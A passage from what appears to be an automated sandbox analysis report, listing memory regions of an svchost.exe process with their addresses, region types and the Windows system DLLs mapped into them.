end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 549 start_va = 0x39b0000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 550 start_va = 0x3a40000 end_va = 0x3abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a40000" filename = "" Region: id = 551 start_va = 0x3ae0000 end_va = 0x3b9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 552 start_va = 0x3bb0000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 553 start_va = 0x3c60000 end_va = 0x3d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 554 start_va = 0x3d60000 end_va = 0x3e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 555 start_va = 0x3e60000 end_va = 0x3f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 556 start_va = 0x3f60000 end_va = 0x405ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 557 start_va = 0x4060000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004060000" filename = "" Region: id = 558 start_va = 0x4180000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 559 start_va = 0x4220000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 560 start_va = 0x42a0000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 561 start_va = 0x43a0000 end_va = 0x539ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 562 start_va = 0x5410000 end_va = 0x548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 563 start_va = 0x5490000 end_va = 0x550ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005490000" filename = "" Region: id = 564 start_va = 0x5530000 end_va = 0x55affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 565 start_va = 0x55e0000 end_va = 0x565ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055e0000" filename = "" Region: id = 566 start_va = 0x5690000 end_va = 0x570ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 567 start_va = 0x5740000 end_va = 0x57bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005740000" filename = "" Region: id = 568 start_va = 0x57c0000 end_va = 0x583ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057c0000" filename = "" Region: id = 569 start_va = 0x5840000 end_va = 0x58bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005840000" filename = "" Region: id = 570 start_va = 0x58d0000 end_va = 0x594ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 571 start_va = 0x5950000 end_va = 0x59cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005950000" filename = "" Region: id = 572 start_va = 0x59e0000 end_va = 0x5a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 573 start_va = 0x5ad0000 end_va = 0x5b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 574 start_va = 0x5b50000 end_va = 0x5bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b50000" filename = "" Region: id = 575 start_va = 0x5c20000 end_va = 0x5c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 576 start_va = 0x5cc0000 end_va = 0x5d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 577 start_va = 0x5d40000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d40000" filename = "" Region: id = 578 start_va = 0x5e00000 end_va = 0x5e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 579 start_va = 0x5e80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 580 start_va = 0x60b0000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 581 start_va = 0x61f0000 end_va = 0x626ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 582 start_va = 0x6290000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 583 start_va = 0x6310000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 584 start_va = 0x6770000 end_va = 0x67effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006770000" filename = "" Region: id = 585 start_va = 0x6830000 end_va = 0x68affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006830000" filename = "" Region: id = 586 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 587 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 588 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 589 start_va = 0x77450000 end_va = 0x77456fff monitored = 0 entry_point = 0x7745106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 590 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 591 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 592 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 593 start_va = 0xff110000 end_va = 0xff11afff monitored = 0 entry_point = 0xff11246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 594 start_va = 0x7fef2bc0000 end_va = 0x7fef2d93fff monitored = 0 entry_point = 0x7fef2bf6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 595 start_va = 0x7fef3340000 end_va = 0x7fef3381fff monitored = 0 entry_point = 0x7fef3370048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 596 start_va = 0x7fef3480000 end_va = 0x7fef3499fff monitored = 0 entry_point = 0x7fef3491ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 597 start_va = 0x7fef3570000 end_va = 0x7fef37c2fff monitored = 0 entry_point = 0x7fef357236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 598 start_va = 0x7fef3cc0000 end_va = 0x7fef3ccefff monitored = 0 entry_point = 0x7fef3cc6894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 599 start_va = 0x7fef3cf0000 end_va = 0x7fef3d34fff monitored = 0 entry_point = 0x7fef3d23644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 600 start_va = 0x7fef3d40000 end_va = 0x7fef3d51fff monitored = 0 entry_point = 0x7fef3d490bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 601 start_va = 0x7fef3d60000 end_va = 0x7fef3d69fff monitored = 0 entry_point = 0x7fef3d63994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 602 start_va = 0x7fef3d70000 end_va = 0x7fef3e41fff monitored = 0 entry_point = 0x7fef3e01a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 603 start_va = 0x7fef5c80000 end_va = 0x7fef5c9bfff monitored = 0 entry_point = 0x7fef5c811a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 604 start_va = 0x7fef5ca0000 end_va = 0x7fef5d01fff monitored = 0 entry_point = 0x7fef5ca1198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 605 start_va = 0x7fef5d10000 end_va = 0x7fef5d49fff monitored = 0 entry_point = 0x7fef5d11010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 606 start_va = 0x7fef6c80000 end_va = 0x7fef6ef9fff monitored = 0 entry_point = 0x7fef6cb2200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 607 start_va = 0x7fef6f00000 end_va = 0x7fef6f16fff monitored = 0 entry_point = 0x7fef6f09d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 608 start_va = 0x7fef7080000 end_va = 0x7fef716dfff monitored = 0 entry_point = 0x7fef70812a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 609 start_va = 0x7fef8aa0000 end_va = 0x7fef8b1bfff monitored = 0 entry_point = 0x7fef8aa11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 610 start_va = 0x7fef8c00000 end_va = 0x7fef8c0bfff monitored = 0 entry_point = 0x7fef8c0602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 611 start_va = 0x7fef8c10000 end_va = 0x7fef8c1efff monitored = 0 entry_point = 0x7fef8c19a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 612 start_va = 0x7fef8c20000 end_va = 0x7fef8c3afff monitored = 0 entry_point = 0x7fef8c21198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 613 start_va = 0x7fef8ed0000 end_va = 0x7fef8ed7fff monitored = 0 entry_point = 0x7fef8ed1414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 614 start_va = 0x7fef8ee0000 end_va = 0x7fef8f50fff monitored = 0 entry_point = 0x7fef8f251d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 615 start_va = 0x7fef8f60000 end_va = 0x7fef8f71fff monitored = 0 entry_point = 0x7fef8f689d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 616 start_va = 0x7fef8f80000 end_va = 0x7fef9034fff monitored = 0 entry_point = 0x7fef8ffcf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 617 start_va = 0x7fef9040000 end_va = 0x7fef9058fff monitored = 0 entry_point = 0x7fef9041104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 618 start_va = 0x7fef9060000 end_va = 0x7fef90affff monitored = 0 entry_point = 0x7fef9061190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 619 start_va = 0x7fef90b0000 end_va = 0x7fef90b7fff monitored = 0 entry_point = 0x7fef90b1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 620 start_va = 0x7fef90c0000 end_va = 0x7fef9119fff monitored = 0 entry_point = 0x7fef90fdde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 621 start_va = 0x7fef9120000 end_va = 0x7fef9140fff monitored = 0 entry_point = 0x7fef91303b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 622 start_va = 0x7fef9150000 end_va = 0x7fef91c3fff monitored = 0 entry_point = 0x7fef91566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 623 start_va = 0x7fef91d0000 end_va = 0x7fef923afff monitored = 0 entry_point = 0x7fef9214344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 624 start_va = 0x7fef9240000 end_va = 0x7fef9252fff monitored = 0 entry_point = 0x7fef9241d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 625 start_va = 0x7fef9260000 end_va = 0x7fef92c1fff monitored = 0 entry_point = 0x7fef929bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 626 start_va = 0x7fef92d0000 end_va = 0x7fef93fbfff monitored = 0 entry_point = 0x7fef9380ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 627 start_va = 0x7fef9400000 end_va = 0x7fef9419fff monitored = 0 entry_point = 0x7fef9413fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 628 start_va = 0x7fef9420000 end_va = 0x7fef94a3fff monitored = 0 entry_point = 0x7fef9471118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 629 start_va = 0x7fef94b0000 end_va = 0x7fef94d4fff monitored = 0 entry_point = 0x7fef94c8c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 630 start_va = 0x7fef94e0000 end_va = 0x7fef951cfff monitored = 0 entry_point = 0x7fef94e1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 631 start_va = 0x7fef9520000 end_va = 0x7fef952dfff monitored = 0 entry_point = 0x7fef9525500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 632 start_va = 0x7fef9530000 end_va = 0x7fef9556fff monitored = 0 entry_point = 0x7fef95311a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 633 start_va = 0x7fef9560000 end_va = 0x7fef9632fff monitored = 0 entry_point = 0x7fef95d8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 634 start_va = 0x7fef9680000 end_va = 0x7fef96c6fff monitored = 0 entry_point = 0x7fef9681040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 635 start_va = 0x7fef96d0000 end_va = 0x7fef9711fff monitored = 0 entry_point = 0x7fef96d17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 636 start_va = 0x7fef9720000 end_va = 0x7fef97b1fff monitored = 0 entry_point = 0x7fef97951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 637 start_va = 0x7fef97c0000 end_va = 0x7fef9836fff monitored = 0 entry_point = 0x7fef97fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 638 start_va = 0x7fef9840000 end_va = 0x7fef9879fff monitored = 0 entry_point = 0x7fef985d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 639 start_va = 0x7fef98d0000 end_va = 0x7fef98ecfff monitored = 0 entry_point = 0x7fef98d2f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 640 start_va = 0x7fef99b0000 end_va = 0x7fef99c4fff monitored = 0 entry_point = 0x7fef99b1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 641 start_va = 0x7fef9b30000 end_va = 0x7fef9b40fff monitored = 0 entry_point = 0x7fef9b39e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 642 start_va = 0x7fef9b50000 end_va = 0x7fef9bb3fff monitored = 0 entry_point = 0x7fef9b51254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 643 start_va = 0x7fef9bc0000 end_va = 0x7fef9c30fff monitored = 0 entry_point = 0x7fef9bc1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 644 start_va = 0x7fef9cf0000 end_va = 0x7fef9d06fff monitored = 0 entry_point = 0x7fef9cf1060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 645 start_va = 0x7fef9d10000 end_va = 0x7fef9ebffff monitored = 0 entry_point = 0x7fef9d11010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 646 start_va = 0x7fefa1a0000 end_va = 0x7fefa1a8fff monitored = 0 entry_point = 0x7fefa1a11a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 647 start_va = 0x7fefa3b0000 end_va = 0x7fefa426fff monitored = 0 entry_point = 0x7fefa3bafd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 648 start_va = 0x7fefa430000 end_va = 0x7fefa439fff monitored = 0 entry_point = 0x7fefa43260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 649 start_va = 0x7fefa440000 end_va = 0x7fefa551fff monitored = 0 entry_point = 0x7fefa45f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 650 start_va = 0x7fefa560000 end_va = 0x7fefa56efff monitored = 0 entry_point = 0x7fefa567e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 651 start_va = 0x7fefa570000 end_va = 0x7fefa578fff monitored = 0 entry_point = 0x7fefa573668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 652 start_va = 0x7fefa580000 end_va = 0x7fefa588fff monitored = 0 entry_point = 0x7fefa581020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 653 start_va = 0x7fefa590000 end_va = 0x7fefa5e5fff monitored = 0 entry_point = 0x7fefa591040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 654 start_va = 0x7fefa5f0000 end_va = 0x7fefa64dfff monitored = 0 entry_point = 0x7fefa5f9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 655 start_va = 0x7fefa650000 end_va = 0x7fefa667fff monitored = 0 entry_point = 0x7fefa651bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 656 start_va = 0x7fefa670000 end_va = 0x7fefa680fff monitored = 0 entry_point = 0x7fefa6716ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 657 start_va = 0x7fefa6a0000 end_va = 0x7fefa6f2fff monitored = 0 entry_point = 0x7fefa6a2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 658 start_va = 0x7fefac90000 end_va = 0x7fefaca3fff monitored = 0 entry_point = 0x7fefac93e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 659 start_va = 0x7fefacb0000 end_va = 0x7fefacbafff monitored = 0 entry_point = 0x7fefacb1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 660 start_va = 0x7fefacc0000 end_va = 0x7feface6fff monitored = 0 entry_point = 0x7fefacc98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 661 start_va = 0x7fefacf0000 end_va = 0x7fefad56fff monitored = 0 entry_point = 0x7fefad06060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 662 start_va = 0x7fefad70000 end_va = 0x7fefad7afff monitored = 0 entry_point = 0x7fefad74f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 663 start_va = 0x7fefad80000 end_va = 0x7fefad8bfff monitored = 0 entry_point = 0x7fefad815d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 664 start_va = 0x7fefad90000 end_va = 0x7fefad9ffff monitored = 0 entry_point = 0x7fefad9835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 665 start_va = 0x7fefada0000 end_va = 0x7fefadb8fff monitored = 0 entry_point = 0x7fefada11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 666 start_va = 0x7fefadc0000 end_va = 0x7fefadf6fff monitored = 0 entry_point = 0x7fefadc8424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 667 start_va = 0x7fefae40000 end_va = 0x7fefae54fff monitored = 0 entry_point = 0x7fefae460d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 668 start_va = 0x7fefae60000 end_va = 0x7fefaf21fff monitored = 0 entry_point = 0x7fefae6101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 669 start_va = 0x7fefb160000 end_va = 0x7fefb168fff monitored = 0 entry_point = 0x7fefb161010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 670 start_va = 0x7fefb250000 end_va = 0x7fefb27cfff monitored = 0 entry_point = 0x7fefb251010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 671 start_va = 0x7fefb280000 end_va = 0x7fefb290fff monitored = 0 entry_point = 0x7fefb2814c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 672 start_va = 0x7fefb2e0000 end_va = 0x7fefb350fff monitored = 0 entry_point = 0x7fefb31ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 673 start_va = 0x7fefb3d0000 end_va = 0x7fefb3e3fff monitored = 0 entry_point = 0x7fefb3d16b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 674 start_va = 0x7fefb3f0000 end_va = 0x7fefb404fff monitored = 0 entry_point = 0x7fefb3f1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 675 start_va = 0x7fefb410000 end_va = 0x7fefb41bfff monitored = 0 entry_point = 0x7fefb4118a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 676 start_va = 0x7fefb420000 end_va = 0x7fefb435fff monitored = 0 entry_point = 0x7fefb4211a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 677 start_va = 0x7fefb550000 end_va = 0x7fefb560fff monitored = 0 entry_point = 0x7fefb551070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 678 start_va = 0x7fefb6b0000 end_va = 0x7fefb6e4fff monitored = 0 entry_point = 0x7fefb6b1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 679 start_va = 0x7fefbb20000 end_va = 0x7fefbb75fff monitored = 0 entry_point = 0x7fefbb2bbc0 region_type = mapped_file name = "uxtheme.dll" 